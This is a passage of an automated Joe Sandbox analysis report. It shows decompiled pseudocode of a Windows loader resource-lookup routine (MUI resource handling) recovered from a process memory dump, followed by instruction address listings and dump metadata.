																goto L165;
															}
															__eax = 0;
															_v64 = __ax;
															__eax = E36AEA630();
															__eflags = __al;
															if(__al == 0) {
																__eax = 0;
																_v64 = __ax;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															 *[fs:0x18] =  *( *[fs:0x18] + 0xfc0);
															__eax =  *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff;
															__eflags = _v164 - __eax;
															if(_v164 >= __eax) {
																__eax = 0;
																__eflags = 0;
																_v64 = __ax;
																L146:
																__ebx = _a8;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															__edx =  *[fs:0x18];
															 &_v153 =  &_v64;
															__edi = _v164;
															__edx =  *( *[fs:0x18] + 0xfc0);
															__eax = E36AEA750(__edx, __edi,  &_v64,  &_v153);
															__si = _v64;
															__eflags = __si;
															if(__si == 0) {
																goto L146;
															}
															__edi = __edi + 1;
															_v164 = __edi;
															_v116 = _v116 - 1;
															__ebx = _a8;
															goto L165;
														case 7:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																L139:
																_t643 = _v76;
																_v64 = _t643;
																goto L165;
															}
															__ecx = _v96;
															__eax = E36AE8858(__ecx, 0, "true");
															__eflags = __eax;
															if(__eax == 0) {
																goto L139;
															}
															__eflags =  *__eax - 0xfecdfecd;
															if( *__eax != 0xfecdfecd) {
																goto L139;
															}
															__ecx =  *(__eax + 0x7c);
															__eflags = __ecx;
															if(__ecx == 0) {
																goto L139;
															}
															 &_v228 = E36B25050(__ecx,  &_v228,  &_v228);
															 &_v196 =  &_v228;
															__eax = E36B056E0( &_v228,  &_v196);
															__eflags = __al;
															if(__al == 0) {
																goto L139;
															}
															__si = _v196;
															_v64 = __si;
															goto L165;
														case 8:
															__si = _v76;
															_v64 = __si;
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) != 0) {
																goto L164;
															}
															__eflags =  *[fs:0x18];
															if( *[fs:0x18] == 0) {
																__ebx = _a8;
																__si = _v64;
															} else {
																__esi =  *[fs:0x18];
																__si =  *((intOrPtr*)(__esi + 0xc4));
																_v64 = __si;
																__ebx = _a8;
															}
															goto L165;
														case 9:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v168;
															_push( &_v168);
															_push("true");
															__eax = E36B22AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__si = _v168;
																_v64 = __si;
															}
															goto L165;
														case 0xa:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v200;
															_push( &_v200);
															_push(0);
															__eax = E36B22AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__eax = _v200;
																__eflags = __eax - _v168;
																if(__eax != _v168) {
																	__si = __ax;
																	_v64 = __si;
																}
															}
															goto L165;
														case 0xb:
															__esi = 0x409;
															_v64 = __si;
															goto L165;
														case 0xc:
															L164:
															__ebx = __ebx | 0x00000020;
															__eflags = __ebx;
															_a8 = __ebx;
															L165:
															_t468 =  !_t555;
															__eflags = _t468 & 0x00000020;
															if((_t468 & 0x00000020) == 0) {
																L168:
																_v76 = _t643 & 0x0000ffff;
																_t470 =  &_v76;
																_v100 = _t470;
																_v152 = _t470;
																_t626 = _v132;
																_v148 = _t626;
																goto L169;
															}
															__eflags = (_t643 & 0x0000ffff) - _v76;
															if((_t643 & 0x0000ffff) != _v76) {
																goto L168;
															}
															_t612 = _v88;
															L106:
															goto L107;
													}
												}
												L90:
												_t443 = _t555 & 0x00000002;
												__eflags = _t568;
												if(_t568 == 0) {
													L97:
													__eflags = _t626;
													if(_t626 == 0) {
														L100:
														_t612 = _v88;
														_t446 = _t612 - _v124 - 1;
														__eflags = _t446;
														if(_t446 == 0) {
															_t627 = 0xc000008a;
															L210:
															_v72 = _t627;
															L211:
															__eflags = _t555 & 0x02040000;
															if((_t555 & 0x02040000) != 0) {
																L220:
																_t642 = _v92;
																L221:
																__eflags = _t627 - 0xc000008a;
																if(_t627 == 0xc000008a) {
																	L223:
																	_t448 =  !_t555;
																	__eflags = _t448 & 0x00080000;
																	if((_t448 & 0x00080000) == 0) {
																		L231:
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																	__eflags = _t448 & 0x00020000;
																	if((_t448 & 0x00020000) == 0) {
																		goto L231;
																	}
																	__eflags = _t448 & 0x00000010;
																	if((_t448 & 0x00000010) == 0) {
																		goto L231;
																	}
																	__eflags = _v88 - 3;
																	if(_v88 != 3) {
																		goto L231;
																	}
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t569 = _a4;
																	__eflags = _t569 - 4;
																	if(_t569 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t557 = _v96;
																	_t627 = L36AEB9C0(_v96,  &_v48, _t569, _t555, _v108);
																	_v72 = _t627;
																	__eflags = _t627;
																	if(_t627 < 0) {
																		goto L231;
																	} else {
																		_t612 = 0;
																		E36AE0C12(_t557, 0,  &_v48, _a4);
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																}
																__eflags = _t627 - 0xc000008b;
																if(_t627 != 0xc000008b) {
																	goto L231;
																}
																goto L223;
															}
															__eflags = _t627 - 0xc000008a;
															if(_t627 == 0xc000008a) {
																L214:
																_t642 = _v92;
																__eflags = _t612 - 3;
																if(_t612 == 3) {
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t573 = _a4;
																	__eflags = _t573 - 4;
																	if(_t573 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t461 = L36AEB9C0(_v96,  &_v48, _t573, _t555 | 0x01000000, _v108);
																	__eflags = _t461 - 0xc00b0001;
																	if(_t461 != 0xc00b0001) {
																		__eflags = _t461 - 0xc00b0006;
																		if(_t461 != 0xc00b0006) {
																			_t627 = _t461;
																			_v72 = _t627;
																		}
																	}
																}
																goto L221;
															}
															__eflags = _t627 - 0xc000008b;
															if(_t627 != 0xc000008b) {
																goto L220;
															}
															goto L214;
														}
														_t463 = _t446 - 1;
														__eflags = _t463;
														if(_t463 == 0) {
															_t627 = 0xc000008b;
															goto L210;
														}
														__eflags = _t463 == 1;
														if(_t463 == 1) {
															_t627 = 0xc0000204;
															_v72 = 0xc0000204;
															__eflags = _v132;
															if(_v132 == 0) {
																goto L211;
															}
															_v136 = 0;
															goto L106;
														}
														_t627 = 0xc000000d;
														goto L210;
													}
													__eflags = _t443;
													if(_t443 == 0) {
														goto L100;
													}
													 *_v108 = _t626;
													_t627 = 0;
													_t612 = _v88;
													goto L210;
												}
												__eflags = _t443;
												if(_t443 != 0) {
													goto L97;
												}
												 *_v108 = _t568;
												_t509 =  *[fs:0x18];
												__eflags =  *(_t509 + 0xfe0);
												if( *(_t509 + 0xfe0) == 0) {
													_v100 =  *[fs:0x18];
													_v100[0x3f8] = E36AF5D90(_t568,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, "true");
												}
												_t510 =  *[fs:0x18];
												__eflags =  *(_t510 + 0xfe0);
												if( *(_t510 + 0xfe0) != 0) {
													_t615 = _v96;
													 *( *( *[fs:0x18] + 0xfe0)) = _t615;
													( *( *[fs:0x18] + 0xfe0))[1] = _v136;
													( *( *[fs:0x18] + 0xfe0))[2] = _t615;
												}
												_t627 = 0;
												_v72 = 0;
												_t555 = _a8;
												_t612 = _v88;
												goto L211;
											}
										}
										_v8 = 0xfffffffe;
										_t432 = 0xc0000089;
										goto L233;
									}
									L77:
									_t626 = 0;
									L78:
									_v128 = _t626;
									goto L79;
								}
								_t520 =  *(_t567 + 0x18) & 0x0000ffff;
								_t612 = 0x10b;
								if(_t520 != 0x10b) {
									_t612 = 0x20b;
									__eflags = _t520 - 0x20b;
									if(__eflags != 0) {
										goto L77;
									}
									_t612 = E36AD7386(_t640, _v80, 2,  &_v180, _t567,  &_v128);
									_t626 = _v128;
									goto L76;
								}
								if( *((intOrPtr*)(_t567 + 0x74)) <= 2) {
									goto L77;
								}
								_t640 =  *(_t567 + 0x88);
								if(_t640 == 0) {
									goto L77;
								}
								_v180 =  *(_t567 + 0x8c);
								if(_v80 != 0 || _t640 <  *((intOrPtr*)(_t567 + 0x54))) {
									_t626 = _v160 + _t640;
									goto L78;
								} else {
									_t597 = _v120;
									_t612 = _t597 + 0x18 + ( *(_t567 + 0x14) & 0x0000ffff);
									_t559 =  *(_t597 + 6) & 0x0000ffff;
									_t598 = 0;
									while(1) {
										_v208 = _t598;
										_v192 = _t612;
										if(_t598 >= _t559) {
											break;
										}
										_t633 =  *((intOrPtr*)(_t612 + 0xc));
										if(_t640 < _t633 || _t640 >=  *((intOrPtr*)(_t612 + 0x10)) + _t633) {
											_t612 = _t612 + 0x28;
											_t598 = _t598 + 1;
											continue;
										} else {
											if(_t612 == 0) {
												break;
											} else {
												_t626 =  *((intOrPtr*)(_t612 + 0x14)) -  *((intOrPtr*)(_t612 + 0xc)) + _t640 + _v160;
												L71:
												_v128 = _t626;
												_t555 = _a8;
												_v100 = _v152;
												if(_t626 == 0) {
													goto L77;
												}
												_t612 = 0;
												goto L76;
											}
										}
									}
									_t626 = 0;
									__eflags = 0;
									goto L71;
								}
							}
							_t26 = _t565 - 1; // 0x2
							if(_t26 > 2) {
								goto L25;
							} else {
								if(_t565 != 3) {
									_t536 = 0;
									__eflags = 0;
								} else {
									_t536 =  *(_t612 + 8) & 0x0000ffff;
								}
								_v120 = _t536;
								_v84 = _t536;
								_t599 =  *_t612;
								if(_t599 == 0x10 || _t599 == 0x18) {
									L20:
									if((_v144 & 0x00000008) == 0 || _t536 != 0 && _t536 != 0x400 && _t536 != 0x800) {
										goto L39;
									} else {
										_t555 = _t555 | 0x00000010;
										_a8 = _t555;
										goto L25;
									}
								} else {
									if((_t599 & 0xffff0000) == 0 || E36B279A0(_t599, L"MUI") != 0) {
										L39:
										_v112 = 0;
										_v140 = 0;
										_v104 = 0;
										_t612 = 0;
										_t537 = E36AED530(_t624, 0, 0, "true");
										_v104 = _t537;
										__eflags = _t537 - 0xffffffff;
										if(_t537 == 0xffffffff) {
											L55:
											_t601 = 0x80000;
											L56:
											_v112 = _t601;
											L57:
											_t555 = _t555 | _t601;
											_a8 = _t555;
											__eflags = _t555 & 0x00040000;
											if((_t555 & 0x00040000) == 0) {
												goto L25;
											}
											_t432 = 0xc000008a;
											_v72 = 0xc000008a;
											__eflags = _t555 & 0x00020000;
											if((_t555 & 0x00020000) == 0) {
												_t602 = _v100;
												_v48 =  *_t602;
												_t620 = _v88;
												__eflags = _t620 - 2;
												if(_t620 < 2) {
													_t539 = 0;
													__eflags = 0;
												} else {
													_t539 = _t602[1];
												}
												_v44 = _t539;
												__eflags = _t620 - 3;
												if(_t620 != 3) {
													_t540 = 0;
													__eflags = 0;
												} else {
													_t540 = _t602[2];
												}
												_v40 = _t540;
												__eflags = _t638 - 4;
												if(_t638 == 4) {
													_v36 = _t602[3];
												}
												_t612 =  &_v48;
												_v72 = L36AEB9C0(_t624,  &_v48, _t638, _t555, _v108);
											}
											goto L68;
										}
										__eflags = _t537;
										if(__eflags != 0) {
											L49:
											_push( &_v112);
											_push(_t555);
											_push( *_v100);
											_push(_t537);
											_t543 = E36AEE7F0(_t555, _t624, _t638, __eflags);
											__eflags = _t543;
											if(_t543 >= 0) {
												_t544 = _v104;
												_t601 = _v112;
												__eflags =  *(_t544 + 0x14) & 0x00000100;
												if(( *(_t544 + 0x14) & 0x00000100) != 0) {
													_t601 = _t601 | 0x00100000;
													__eflags = _t601;
													_v112 = _t601;
												}
												__eflags =  *(_t544 + 0x10) & 0x00000010;
												if(( *(_t544 + 0x10) & 0x00000010) == 0) {
													goto L57;
												}
												_t601 = _t601 | 0x00200000;
											} else {
												_t601 = 0x60000;
											}
											goto L56;
										}
										_v60 = L"MUI";
										_v56 = 1;
										_v52 = _t537;
										_t546 = E36AEC6E0(_t624,  &_v60, 3, 0x2000030,  &_v176);
										_t607 = _t546;
										_v184 = _t607;
										__eflags = _t607;
										if(__eflags >= 0) {
											_t607 = E36AEDA30(_t624, _v176,  &_v104,  &_v140);
											_v184 = _t607;
											__eflags = _t607;
											if(__eflags < 0) {
												L46:
												_v104 = 0;
												_t551 = 0xffffffff;
												goto L48;
											}
											_t551 = _v104;
											__eflags =  *_t551 - 0xfecdfecd;
											if(__eflags == 0) {
												_v140 = 0;
												goto L48;
											} else {
												_t607 = 0xc000007b;
												_v184 = 0xc000007b;
												goto L46;
											}
										} else {
											_v104 = 0;
											_t551 = _t546 | 0xffffffff;
											L48:
											_push(0);
											_push(_t607);
											_push(2);
											_push(0);
											_push(_t551);
											_push(0);
											_t612 = 0;
											E36AE93A6(_t555, _t624, 0, _t624, _t638, __eflags);
											_t537 = _v104;
											__eflags = _t537;
											if(__eflags == 0) {
												goto L55;
											}
											goto L49;
										}
									} else {
										_t536 = _v120;
										goto L20;
									}
								}
							}
						}
						if(_t435 == 0) {
							goto L232;
						}
						if(_t638 != _t638) {
							goto L9;
						} else {
							_t565 = 3;
							_v88 = 3;
							goto L10;
						}
					} else {
						goto L232;
					}
				} else {
					L232:
					_t432 = 0xc00000f1;
					L233:
					 *[fs:0x0] = _v20;
					_pop(_t625);
					_pop(_t639);
					_pop(_t556);
					return E36B24B50(_t432, _t556, _v32 ^ _t647, _t612, _t625, _t639);
				}
			}

0x36aec6e0
0x36aec6e5
0x36aec6e7
0x36aec6ec
0x36aec6f7
0x36aec6fe
0x36aec703
0x36aec706
0x36aec708
0x36aec70e
0x36aec712
0x36aec718
0x36aec71b
0x36aec71e
0x36aec720
0x36aec723
0x36aec72c
0x36aec72f
0x36aec732
0x36aec736
0x36aec740
0x36aec74a
0x36aec74d
0x36aec753
0x36aec761
0x00000000
0x00000000
0x36aec769
0x36aec76c
0x36aec77a
0x36aec792
0x36aec792
0x36aec794
0x36aec797
0x36aec797
0x36aec79a
0x36aec7a3
0x36aec7a5
0x36aec7ad
0x36aec82c
0x36aec82e
0x36aec831
0x36aec834
0x36aec836
0x36aec83c
0x36aec843
0x36aec845
0x36aec84b
0x36aec853
0x36aec859
0x36aec85f
0x36aec85f
0x36aec875
0x36aec877
0x36aec87c
0x36aecb19
0x36aecb1b
0x36aecb22
0x36aecb22
0x36aecb2a
0x36aecb4e
0x36aecb53
0x36aecb56
0x36aecb58
0x36aecaba
0x36aecaba
0x00000000
0x36aecaba
0x36aecb5e
0x36aecb64
0x36aecb6b
0x36aecb72
0x36aecb74
0x36aecb7a
0x36aecb7f
0x36aecb83
0x36aecb85
0x36aecb89
0x36aecb90
0x36aecb90
0x36aecb92
0x00000000
0x00000000
0x36aecb94
0x36aecb99
0x36aecb9a
0x36aecb9d
0x36aecb9f
0x00000000
0x00000000
0x36aecba1
0x36aecba3
0x36aecba6
0x36aecba8
0x36aecbab
0x36aecbad
0x36aecbad
0x36aecbab
0x36aecbb0
0x36aecbb4
0x36aed045
0x36aed045
0x36aed049
0x36aed053
0x36aed060
0x36aed066
0x36aed06b
0x36aed06e
0x36aed070
0x00000000
0x00000000
0x36aed07d
0x36aed088
0x36aed08d
0x36aed090
0x36aed092
0x00000000
0x00000000
0x36aed098
0x36aed09b
0x36aed0a1
0x36aed0a9
0x36aed0af
0x36aed0bd
0x36aed0bf
0x36aed0d2
0x36aed0d8
0x36aed0e2
0x36aed0e4
0x36aed0ea
0x36aed0ef
0x36aed0f2
0x36aed0f8
0x36aed0ff
0x36aed0ff
0x36aed106
0x36aed109
0x36aed238
0x36aed23c
0x36aed270
0x36aed28c
0x36aed294
0x36aed299
0x36aed29b
0x00000000
0x00000000
0x36aed2a4
0x36aed2a7
0x36aed2aa
0x36aed2b0
0x36aed2b6
0x00000000
0x36aed2b6
0x36aed23e
0x36aed241
0x00000000
0x00000000
0x36aed243
0x36aed245
0x36aed24d
0x36aed253
0x36aed259
0x36aed25f
0x00000000
0x00000000
0x36aed265
0x00000000
0x36aed10f
0x36aed10f
0x36aed117
0x36aed117
0x36aed11a
0x36aed150
0x36aed155
0x36aed155
0x36aed158
0x36aed15b
0x36aed161
0x36aed1b4
0x36aed1b4
0x36aed1ba
0x36aed1c4
0x36aed1c6
0x36aed1c8
0x36aed1cd
0x36aed1cf
0x36aed1d4
0x36aed1d6
0x36aed1d8
0x36aed1da
0x36aed1dd
0x36aed1e1
0x36aed1e7
0x36aed1ed
0x36aed1f0
0x36aed1f3
0x36aed1f6
0x36aed1fb
0x36aed1fb
0x36aed203
0x36aed206
0x36aed210
0x36aed212
0x36aed215
0x36aed217
0x36aed221
0x36aed221
0x36aed225
0x36aed225
0x36aed217
0x36aed1dd
0x36aed1d8
0x36aed1d4
0x36aed22a
0x36aed22a
0x36aed231
0x00000000
0x36aed231
0x36aed1bc
0x36aed1c2
0x00000000
0x00000000
0x00000000
0x36aed1c2
0x36aed163
0x36aed166
0x00000000
0x00000000
0x36aed16a
0x36aed170
0x36aed176
0x36aed179
0x36aed17c
0x36aed17f
0x36aed184
0x36aed184
0x36aed193
0x36aed199
0x36aed19e
0x36aed1a1
0x36aed1a6
0x36aed1a8
0x36aed1ad
0x00000000
0x00000000
0x36aed1af
0x36aed1b1
0x36aed1b1
0x36aed1b1
0x00000000
0x36aed1a6
0x36aed11c
0x36aed11c
0x36aed11f
0x36aed149
0x00000000
0x36aed149
0x36aed121
0x36aed124
0x36aed138
0x36aed13b
0x36aed142
0x00000000
0x36aed142
0x36aed126
0x36aed12b
0x00000000
0x36aed12b
0x36aed109
0x36aed0c1
0x36aed0c1
0x36aed0c8
0x00000000
0x36aecbba
0x36aecbbc
0x36aecbc3
0x36aecbc7
0x36aecbd0
0x36aecbd3
0x36aecce1
0x36aecce1
0x36aecce4
0x36aecce7
0x36aeccea
0x36aecdcc
0x36aecdcc
0x36aecdd3
0x00000000
0x36aecdd3
0x36aeccf0
0x00000000
0x36aeccf9
0x36aeccfd
0x36aecd0a
0x36aecd10
0x00000000
0x00000000
0x00000000
0x36aecd10
0x00000000
0x00000000
0x36aecd23
0x36aecd25
0x36aecd27
0x36aecd2c
0x00000000
0x00000000
0x36aecd32
0x36aecd37
0x00000000
0x00000000
0x36aecd3d
0x36aecd3f
0x00000000
0x00000000
0x36aecd45
0x36aecd47
0x36aecd4a
0x36aecd4d
0x36aecd54
0x36aecd54
0x36aecd4f
0x36aecd4f
0x36aecd4f
0x36aecd56
0x36aecd59
0x36aecd5c
0x36aecd63
0x36aecd63
0x36aecd5e
0x36aecd5e
0x36aecd5e
0x36aecd65
0x36aecd68
0x36aecd6b
0x36aecd6e
0x36aecd70
0x36aecd73
0x36aecd73
0x36aecd7b
0x36aecd7e
0x36aecd81
0x36aecd86
0x36aecd88
0x36aecd8b
0x36aecd8d
0x00000000
0x36aecd93
0x36aecd94
0x36aecd98
0x36aecd9a
0x36aecd9d
0x36aecda2
0x36aecda9
0x00000000
0x36aecda9
0x00000000
0x36aecdb0
0x36aecdb4
0x36aecd16
0x36aecd16
0x36aecd1a
0x00000000
0x36aecd1a
0x36aecdba
0x36aecdbe
0x00000000
0x00000000
0x36aecdc7
0x36aecdca
0x36aecddd
0x36aecde1
0x36aecdf0
0x36aecdf6
0x36aecdfb
0x36aecdfd
0x36aeccff
0x36aeccff
0x36aecd01
0x00000000
0x36aecd01
0x36aece03
0x36aece07
0x36aece0a
0x36aece10
0x36aece10
0x00000000
0x36aece0a
0x36aecde3
0x36aecde7
0x00000000
0x36aecde7
0x00000000
0x00000000
0x36aece18
0x36aece1c
0x36aece2b
0x36aece2f
0x36aece32
0x36aece1e
0x36aece1e
0x36aece22
0x36aece22
0x00000000
0x00000000
0x36aece3b
0x36aece3f
0x00000000
0x00000000
0x00000000
0x00000000
0x36aece4e
0x36aece52
0x36aece56
0x36aece59
0x00000000
0x00000000
0x36aece5f
0x36aece61
0x36aece65
0x36aece6a
0x36aece6c
0x36aecedb
0x36aecedd
0x36aecee1
0x36aecee5
0x00000000
0x36aecee5
0x36aece74
0x36aece7a
0x36aece7e
0x36aece84
0x36aecec5
0x36aecec5
0x36aecec7
0x36aececb
0x36aececb
0x36aecece
0x36aeced2
0x00000000
0x36aeced2
0x36aece86
0x36aece94
0x36aece98
0x36aece9f
0x36aecea5
0x36aeceaa
0x36aeceae
0x36aeceb1
0x00000000
0x00000000
0x36aeceb3
0x36aeceb4
0x36aeceba
0x36aecebd
0x00000000
0x00000000
0x36aeceee
0x36aecef0
0x36aecef2
0x36aecef7
0x36aece41
0x36aece41
0x36aece45
0x00000000
0x36aece45
0x36aecf01
0x36aecf04
0x36aecf09
0x36aecf0b
0x00000000
0x00000000
0x36aecf11
0x36aecf17
0x00000000
0x00000000
0x36aecf1d
0x36aecf20
0x36aecf22
0x00000000
0x00000000
0x36aecf32
0x36aecf3e
0x36aecf45
0x36aecf4a
0x36aecf4c
0x00000000
0x00000000
0x36aecf52
0x36aecf59
0x00000000
0x00000000
0x36aecf62
0x36aecf66
0x36aecf6a
0x36aecf6c
0x36aecf6e
0x36aecf73
0x00000000
0x00000000
0x36aecf79
0x36aecf81
0x36aecf9a
0x36aecf9d
0x36aecf83
0x36aecf83
0x36aecf8a
0x36aecf91
0x36aecf95
0x36aecf95
0x00000000
0x00000000
0x36aecfa3
0x36aecfa7
0x36aecfab
0x36aecfb1
0x36aecfb2
0x36aecfb4
0x36aecfb9
0x36aecfbc
0x36aecfbe
0x36aecfc0
0x36aecfc7
0x36aecfc7
0x00000000
0x00000000
0x36aecfcd
0x36aecfd1
0x36aecfd5
0x36aecfdb
0x36aecfdc
0x36aecfde
0x36aecfe3
0x36aecfe6
0x36aecfe8
0x36aecfea
0x36aecff0
0x36aecff6
0x36aecff8
0x36aecffb
0x36aecffb
0x36aecff6
0x00000000
0x00000000
0x36aed001
0x36aed006
0x00000000
0x00000000
0x36aed00c
0x36aed00c
0x36aed00c
0x36aed00f
0x36aed012
0x36aed014
0x36aed016
0x36aed018
0x36aed02a
0x36aed02d
0x36aed030
0x36aed033
0x36aed036
0x36aed03c
0x36aed03f
0x00000000
0x36aed03f
0x36aed01d
0x36aed020
0x00000000
0x00000000
0x36aed022
0x36aeccd9
0x00000000
0x00000000
0x36aeccf0
0x36aecbdc
0x36aecbde
0x36aecbe1
0x36aecbe3
0x36aecc7d
0x36aecc7d
0x36aecc7f
0x36aecc94
0x36aecc94
0x36aecc9c
0x36aecc9c
0x36aecc9f
0x36aed2c8
0x36aed2cd
0x36aed2cd
0x36aed2d0
0x36aed2d0
0x36aed2d6
0x36aed33b
0x36aed33b
0x36aed33e
0x36aed33e
0x36aed344
0x36aed352
0x36aed354
0x36aed356
0x36aed35b
0x36aed3ef
0x36aed3ef
0x36aed3f6
0x00000000
0x36aed3f6
0x36aed361
0x36aed366
0x00000000
0x00000000
0x36aed36c
0x36aed36e
0x00000000
0x00000000
0x36aed374
0x36aed378
0x00000000
0x00000000
0x36aed37c
0x36aed382
0x36aed388
0x36aed38b
0x36aed38e
0x36aed391
0x36aed396
0x36aed396
0x36aed39e
0x36aed3a1
0x36aed3ab
0x36aed3ad
0x36aed3b0
0x36aed3b2
0x00000000
0x36aed3b4
0x36aed3bc
0x36aed3c0
0x36aed3c5
0x36aed3cc
0x00000000
0x36aed3cc
0x36aed3b2
0x36aed346
0x36aed34c
0x00000000
0x00000000
0x00000000
0x36aed34c
0x36aed2d8
0x36aed2de
0x36aed2e8
0x36aed2e8
0x36aed2eb
0x36aed2ee
0x36aed2f2
0x36aed2f8
0x36aed2fe
0x36aed301
0x36aed304
0x36aed307
0x36aed30c
0x36aed30c
0x36aed31b
0x36aed321
0x36aed326
0x36aed32b
0x36aed32d
0x36aed332
0x36aed334
0x36aed336
0x36aed336
0x36aed332
0x36aed32b
0x00000000
0x36aed2ee
0x36aed2e0
0x36aed2e6
0x00000000
0x00000000
0x00000000
0x36aed2e6
0x36aecca5
0x36aecca5
0x36aecca8
0x36aed2c1
0x00000000
0x36aed2c1
0x36aeccae
0x36aeccb1
0x36aeccbd
0x36aeccc2
0x36aeccc5
0x36aeccc9
0x00000000
0x00000000
0x36aecccf
0x00000000
0x36aecccf
0x36aeccb3
0x00000000
0x36aeccb3
0x36aecc81
0x36aecc83
0x00000000
0x00000000
0x36aecc88
0x36aecc8a
0x36aecc8c
0x00000000
0x36aecc8c
0x36aecbe9
0x36aecbeb
0x00000000
0x00000000
0x36aecbf4
0x36aecbf6
0x36aecbfc
0x36aecc03
0x36aecc0b
0x36aecc23
0x36aecc23
0x36aecc29
0x36aecc2f
0x36aecc36
0x36aecc44
0x36aecc47
0x36aecc5b
0x36aecc6a
0x36aecc6a
0x36aecc6d
0x36aecc6f
0x36aecc72
0x36aecc75
0x00000000
0x36aecc75
0x36aecb90
0x36aecb2c
0x36aecb33
0x00000000
0x36aecb33
0x36aecb1d
0x36aecb1d
0x36aecb1f
0x36aecb1f
0x00000000
0x36aecb1f
0x36aec882
0x36aec886
0x36aec88e
0x36aecaf2
0x36aecaf7
0x36aecafa
0x00000000
0x00000000
0x36aecb14
0x36aecb16
0x00000000
0x36aecb16
0x36aec898
0x00000000
0x00000000
0x36aec89e
0x36aec8a6
0x00000000
0x00000000
0x36aec8b2
0x36aec8bc
0x36aecaee
0x00000000
0x36aec8cb
0x36aec8d2
0x36aec8d8
0x36aec8da
0x36aec8de
0x36aec8e0
0x36aec8e0
0x36aec8e6
0x36aec8ee
0x00000000
0x00000000
0x36aec8f4
0x36aec8f9
0x36aecac6
0x36aecac9
0x00000000
0x36aec90c
0x36aec90e
0x00000000
0x36aec914
0x36aec91c
0x36aecad1
0x36aecad1
0x36aecad4
0x36aecadd
0x36aecae2
0x00000000
0x00000000
0x36aecae4
0x00000000
0x36aecae4
0x36aec90e
0x36aec8f9
0x36aecacf
0x36aecacf
0x00000000
0x36aecacf
0x36aec8bc
0x36aec7af
0x36aec7b5
0x00000000
0x36aec7b7
0x36aec7ba
0x36aec7c2
0x36aec7c2
0x36aec7bc
0x36aec7bc
0x36aec7bc
0x36aec7c4
0x36aec7c7
0x36aec7cb
0x36aec7d0
0x36aec7fc
0x36aec803
0x00000000
0x36aec826
0x36aec826
0x36aec829
0x00000000
0x36aec829
0x36aec7d7
0x36aec7dd
0x36aec927
0x36aec927
0x36aec92e
0x36aec938
0x36aec943
0x36aec947
0x36aec94c
0x36aec94f
0x36aec952
0x36aeca4a
0x36aeca4a
0x36aeca4f
0x36aeca4f
0x36aeca52
0x36aeca52
0x36aeca54
0x36aeca57
0x36aeca5d
0x00000000
0x00000000
0x36aeca63
0x36aeca68
0x36aeca6b
0x36aeca71
0x36aeca73
0x36aeca78
0x36aeca7b
0x36aeca7e
0x36aeca81
0x36aeca88
0x36aeca88
0x36aeca83
0x36aeca83
0x36aeca83
0x36aeca8a
0x36aeca8d
0x36aeca90
0x36aeca97
0x36aeca97
0x36aeca92
0x36aeca92
0x36aeca92
0x36aeca99
0x36aeca9c
0x36aeca9f
0x36aecaa4
0x36aecaa4
0x36aecaad
0x36aecab7
0x36aecab7
0x00000000
0x36aeca71
0x36aec958
0x36aec95a
0x36aeca09
0x36aeca0c
0x36aeca0d
0x36aeca11
0x36aeca13
0x36aeca14
0x36aeca19
0x36aeca1b
0x36aeca24
0x36aeca27
0x36aeca2a
0x36aeca31
0x36aeca33
0x36aeca33
0x36aeca39
0x36aeca39
0x36aeca3c
0x36aeca40
0x00000000
0x00000000
0x36aeca42
0x36aeca1d
0x36aeca1d
0x36aeca1d
0x00000000
0x36aeca1b
0x36aec960
0x36aec967
0x36aec96e
0x36aec984
0x36aec989
0x36aec98b
0x36aec991
0x36aec993
0x36aec9b9
0x36aec9bb
0x36aec9c1
0x36aec9c3
0x36aec9db
0x36aec9dd
0x36aec9e0
0x00000000
0x36aec9e0
0x36aec9c5
0x36aec9c8
0x36aec9ce
0x36aec9e5
0x00000000
0x36aec9d0
0x36aec9d0
0x36aec9d5
0x00000000
0x36aec9d5
0x36aec995
0x36aec995
0x36aec99c
0x36aec9ef
0x36aec9ef
0x36aec9f1
0x36aec9f2
0x36aec9f4
0x36aec9f6
0x36aec9f7
0x36aec9f9
0x36aec9fd
0x36aeca02
0x36aeca05
0x36aeca07
0x00000000
0x00000000
0x00000000
0x36aeca07
0x36aec7f9
0x36aec7f9
0x00000000
0x36aec7f9
0x36aec7dd
0x36aec7d0
0x36aec7b5
0x36aec77e
0x00000000
0x00000000
0x36aec786
0x00000000
0x36aec788
0x36aec788
0x36aec78d
0x00000000
0x36aec78d
0x00000000
0x00000000
0x00000000
0x36aed3fa
0x36aed3fa
0x36aed3fa
0x36aed3ff
0x36aed402
0x36aed40a
0x36aed40b
0x36aed40c
0x36aed41a
0x36aed41a

Strings

MUI, xrefs: 36AEC7E3, 36AEC960

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 7a38b6af12c412c9093b97415aff6f2137a54f2c9aba9d33239784f8ce3aa3aa
Instruction ID: 0d0c1c6356c3e5d4c4009d9290e108e1e557f37f020461d6bd197e3d567968a9
